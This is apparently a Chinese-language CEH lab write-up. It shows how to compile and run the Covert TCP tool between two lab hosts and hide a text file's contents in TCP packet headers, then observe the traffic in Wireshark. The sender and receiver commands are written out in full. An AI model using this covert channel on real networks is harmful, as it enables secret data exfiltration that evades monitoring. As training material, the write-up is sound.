分析 Covert TCP 網路流量

 分析 Covert TCP 網路流量




使用工具 Covert TCP,將未編譯檔案複製至要接收訊息的主機 (10.10.10.9)
檔案位於工具包路徑 E:\CEH-Tools\CEHv11 Module 06 System Hacking\Covering Tracks Tools\Covert_TCP 底下



ls 確認檔案存在於 Home 底下,進行編譯

指令 : gcc covert_tcp.c -o covert_tcp

再 ls 一次確認編譯完成檔案存在






執行指令開始接收訊息
指令 : sudo ./covert_tcp -dest 10.10.10.9 -source 10.10.10.13 -dest_port 8008 -source_port 9009 -server -file received.txt
參數 source : 送訊息的主機
參數 dest : 接收訊息的主機





同樣於要傳送訊息的主機 10.10.10.13 執行相同作業將工具進行編譯並確認存在



於要傳送訊息的主機建立一個文字檔 send.txt 當中的文字為 [ Top Secret!! ]






於送訊息主機端開啟 WireShark 進行封包抓取,過濾時選擇 TCP 即可









傳送端執行指令開始進行訊息傳送
指令 : sudo ./covert_tcp -source 10.10.10.13 -dest 10.10.10.9 -source_port 8008 -dest_port 9009 -file send.txt
注意這裡 -source、-dest 與前面一樣,但是 Port 的 source & dest 剛好顛倒
執行後可以看到開始傳送文字檔中的訊息如下







於接收端同樣可以看到文字訊息檔一個一個傳送過來,傳送完畢後可以 cat 檔案看一下內容





開啟 WireShark 可以看到傳送的訊息包在 TCP 封包表頭中,一個封包塞入一個文字慢慢傳送









留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

濫用 Windows 庫文件(Library File)

Challenge 0 - Secura(1)